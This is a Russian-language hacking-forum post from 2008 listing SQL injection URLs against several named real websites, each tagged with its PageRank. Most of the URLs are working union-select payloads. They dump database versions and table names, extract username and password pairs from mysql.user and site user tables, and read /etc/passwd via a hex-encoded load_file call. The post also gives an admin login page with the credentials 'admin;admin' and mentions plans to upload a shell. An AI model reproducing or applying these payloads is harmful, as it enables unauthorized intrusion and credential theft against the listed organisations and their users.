|
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
Провел на форуме:
1404552
Репутация:
568
|
|
Glaad.org - PR 7
http://www.glaad.org/media/resource_kit_detail.php?id=999999+union+select+1,2 ,3,4,5,version(),7,8,9,10,11,12,13,14,15,16,17,18, 19,20--
4 версия. но есть права )
http://www.glaad.org/media/resource_kit_detail.php?id=999999+union+select+1,2 ,3,4,5,concat_ws(0x3a,user,password),7,8,9,10,11,1 2,13,14,15,16,17,18,19,20+from+mysql.user--
и так..
http://www.glaad.org/media/resource_kit_detail.php?id=999999+union+select+1,2 ,3,4,5,load_file(0x2F6574632F706173737764),7,8,9,1 0,11,12,13,14,15,16,17,18,19,20-_
не пробвал шелл заливать.. думаю фильтирует кавычки...
Onthecommons.org - PR 6
http://onthecommons.org/content.php?id=99999'+union+select+concat_ws(0x3a, username,password)+from+onthec5_main.users+limit+0 ,1/*
http://onthecommons.org/login.php
admin;admin
Clasp.org - PR 6
http://www.clasp.org/publications.php?id=999999+UNION+SELECT+1,2,concat _ws(0x3a,version(),user(),database()),4,5,6,7,8,9, 10,11,12,13,14,15/*
TurkishCulturalFoundation.org - PR 5
http://www.turkishculturalfoundation.org/pages.php?ID=999999'+union+select+unhex(hex(concat _ws(0x3a,version(),table_name)))+from+information_ schema.tables+limit+26,1/*
Agsafe.com.au - PR 4
http://www.agsafe.com.au/guardian/content.php?id=9999999+union+select+1,2,unhex(hex( version())),4,5,6,7,8,9,10,11,12,13,14/*
Последний раз редактировалось sabe; 13.07.2008 в 08:39..
|